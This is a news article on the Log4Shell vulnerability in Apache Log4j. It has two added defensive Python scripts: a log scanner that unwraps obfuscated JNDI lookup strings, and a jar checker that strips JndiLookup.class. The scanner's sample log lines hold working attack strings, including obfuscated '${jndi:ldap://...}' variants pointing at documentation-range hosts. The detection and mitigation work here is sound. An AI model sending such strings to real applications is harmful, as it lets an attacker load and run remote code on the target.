A critical remote code execution vulnerability (CVE-2021-44228) has been reported in Apache Log4j, a widely used Java logging library. On December 11, the JPCERT Coordination Center (JPCERT/CC) issued an emergency alert after confirming attack attempts against the vulnerability in Japan.
The vulnerability was reported on December 9 (US time) by Chen Zhaojun of the Alibaba Cloud Security Team. Log4j is embedded in a very large number of applications as the library that writes their logs.
According to JPCERT/CC, the vulnerability stems from Log4j's Lookup feature, which replaces variables embedded in a log message with their values. The JNDI Lookup included in that feature can be abused: an attacker sends a crafted string to a remote application, and when the application hands that string to Log4j to be logged, the lookup directs Log4j to fetch a Java class file from a location named in the string and to load and execute it, so the attacker can run arbitrary code. Any user-controlled input that ends up in a log message (HTTP headers, form fields, user names) is a potential delivery path. The affected versions are 2.0-beta9 through 2.14.1.
Proof-of-concept (PoC) code exploiting the vulnerability has already been published, and JPCERT/CC has confirmed traffic within Japan attempting to exploit it. The vulnerability has come to be known as "Log4Shell". In the analysis by the Apache Software Foundation, which develops Log4j, the vulnerability was assigned the maximum Common Vulnerability Scoring System (CVSS) score of 10.0.
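The following Python script is an added example and is not from the article, JPCERT/CC or the Log4j project. It scans constructed web-server access-log lines (sample data, not real traffic) for the crafted lookup strings described above, including two obfuscation forms that were used to hide the literal "jndi" token from simple filters. The log format and the obfuscation patterns it unwraps are assumptions; finding such a string in a log proves only that an attempt was made, not that it succeeded.

```python
from __future__ import annotations

import re

# Innermost lookups commonly used to hide the literal token "jndi" from naive filters:
#   ${lower:J} -> J   ${upper:j} -> j   ${::-j} -> j   ${env:UNSET:-j} -> j
# (case is ignored later, so lower/upper only need unwrapping, not conversion)
_OBFUSCATION = re.compile(
    r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]+?)\s*\}"   # ${lower:x} / ${upper:x}
    r"|\$\{\s*[^${}]*?:-([^${}]*)\}"                  # ${key:-default} with any (or empty) key
)

# The dangerous pattern itself: "${jndi:<scheme>:" followed by an attacker-chosen location.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def deobfuscate(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups until the string stops changing (bounded to avoid loops)."""
    for _ in range(max_rounds):
        new = _OBFUSCATION.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(line: str) -> list[str]:
    """Return the JNDI schemes (ldap, rmi, dns, ...) referenced by lookups in one log line."""
    return [m.group(1).lower() for m in _JNDI.finditer(deobfuscate(line))]


def scan_log(lines: list[str]) -> list[tuple[int, str]]:
    """(1-based line number, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for scheme in find_jndi_lookups(line):
            hits.append((n, scheme))
    return hits


# Constructed sample access-log lines (not real traffic); the addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Dec/2021:03:14:07 +0900] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.5 - - [11/Dec/2021:03:14:09 +0900] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.5 - - [11/Dec/2021:03:14:12 +0900] "GET /login HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.5:1099/x}"',
    '203.0.113.5 - - [11/Dec/2021:03:14:15 +0900] "GET /api HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.5/probe}"',
    '198.51.100.7 - - [11/Dec/2021:03:14:20 +0900] "GET /status HTTP/1.1" 200 12 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for n, scheme in scan_log(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme}: {SAMPLE_LOG[n - 1]}")
```

The scanner only looks at the User-Agent column by accident of the sample data; the same functions can be run over any field that an application might log, and the deobfuscation step is the part worth keeping, since a plain search for "${jndi:" misses the second and third attempts above.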
The Apache Software Foundation has released Log4j 2.15.0, which fixes the vulnerability, and is urging application developers to update promptly. In the fixed version, message lookups are disabled by default. As interim mitigations, for versions 2.10 and later, set the system property "log4j2.formatMsgNoLookups" to true (passed to the JVM as -Dlog4j2.formatMsgNoLookups=true) or set the environment variable "LOG4J_FORMAT_MSG_NO_LOOKUPS" to true; for earlier versions back to 2.0-beta9, remove the JndiLookup class from the jar on the classpath, for example with "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class". Either workaround must be applied to every copy of log4j-core an application loads, including copies bundled inside other jars.
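As an added example (not code from the article or the Apache project), the following Python script models the triage steps above: it reads the version from a log4j-core jar's manifest, checks it against the affected range 2.0-beta9 through 2.14.1, reports which interim workaround applies to that build, and removes JndiLookup.class from the jar as the "zip -q -d" step does. The jar it inspects is a stand-in constructed in a temporary directory, not the real artifact; the manifest field and class path it relies on are assumptions about the real jar's layout.

```python
from __future__ import annotations

import pathlib
import re
import tempfile
import zipfile

# Class deleted by the "zip -q -d" workaround; path assumed to match the real log4j-core jar.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?")


def parse_version(version: str) -> tuple[int, int, int, str | None, int | None]:
    """'2.14.1' -> (2, 14, 1, None, None); '2.0-beta9' -> (2, 0, 0, 'beta', 9)."""
    m = _VERSION_RE.fullmatch(version.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {version!r}")
    return int(m[1]), int(m[2]), int(m[3] or 0), m[4], int(m[5]) if m[5] else None


def is_affected_version(version: str) -> bool:
    """True for the range named in the advisory: 2.0-beta9 through 2.14.1."""
    major, minor, patch, tag, num = parse_version(version)
    if major != 2:
        return False
    if tag == "beta":
        return minor == 0 and patch == 0 and num >= 9   # JndiLookup first shipped in 2.0-beta9
    if tag == "rc":
        return minor == 0 and patch == 0                # 2.0-rc builds came after beta9
    return (minor, patch) <= (14, 1)


def mitigation_for(version: str) -> str:
    """Which interim workaround from the advisory applies to this build."""
    if not is_affected_version(version):
        return "not in the affected range"
    if parse_version(version)[1] >= 10:
        return ("upgrade to 2.15.0, or start the JVM with -Dlog4j2.formatMsgNoLookups=true "
                "(or export LOG4J_FORMAT_MSG_NO_LOOKUPS=true)")
    return "upgrade to 2.15.0, or delete JndiLookup.class from log4j-core"


def read_version(jar_path) -> str | None:
    """Implementation-Version from META-INF/MANIFEST.MF (assumed to be where log4j-core records it)."""
    with zipfile.ZipFile(jar_path) as zf:
        try:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        except KeyError:
            return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def has_jndi_lookup(jar_path) -> bool:
    with zipfile.ZipFile(jar_path) as zf:
        return JNDI_LOOKUP_CLASS in zf.namelist()


def remove_jndi_lookup(jar_path) -> bool:
    """Rewrite the jar without JndiLookup.class (equivalent of the zip -q -d command)."""
    src = pathlib.Path(jar_path)
    tmp = src.with_name(src.name + ".tmp")
    removed = False
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(tmp, "w") as zout:
        for item in zin.infolist():
            if item.filename == JNDI_LOOKUP_CLASS:
                removed = True
                continue
            zout.writestr(item, zin.read(item.filename))
    tmp.replace(src)
    return removed


def assess_jar(jar_path) -> dict:
    version = read_version(jar_path)
    affected = version is not None and is_affected_version(version)
    present = has_jndi_lookup(jar_path)
    return {
        "version": version,
        "affected_version": affected,
        "jndi_lookup_present": present,
        "exploitable": affected and present,   # once the class is gone the lookup cannot run
        "mitigation": mitigation_for(version) if version else "version unknown: inspect manually",
    }


def make_sample_jar(directory, version: str, include_jndi: bool = True) -> pathlib.Path:
    """Construct a stand-in log4j-core jar for the demo; NOT the real artifact."""
    path = pathlib.Path(directory) / f"log4j-core-{version}.jar"
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr("org/apache/logging/log4j/core/lookup/StrLookup.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return path


def demo() -> dict:
    """Build a stand-in 2.14.1 jar, assess it, apply the class-removal workaround, assess again."""
    with tempfile.TemporaryDirectory() as tmpdir:
        jar = make_sample_jar(tmpdir, "2.14.1")
        before = assess_jar(jar)
        removed = remove_jndi_lookup(jar)
        after = assess_jar(jar)
    return {"before": before, "removed": removed, "after": after}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a real system, run assess_jar over every log4j-core jar found on the classpath (including jars nested inside application archives). The version string alone is not enough once the workaround has been applied, which is why the script also reports whether JndiLookup.class is still present.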
Cisco Systems, Amazon Web Services (AWS), Salesforce.com, VMware, IBM, Red Hat, NetApp, and Oracle have announced that some of their products and services, which use Log4j, are affected.
Palo Alto Networks, SonicWall, Trend Micro, Pulse Secure and others are investigating whether their products are affected.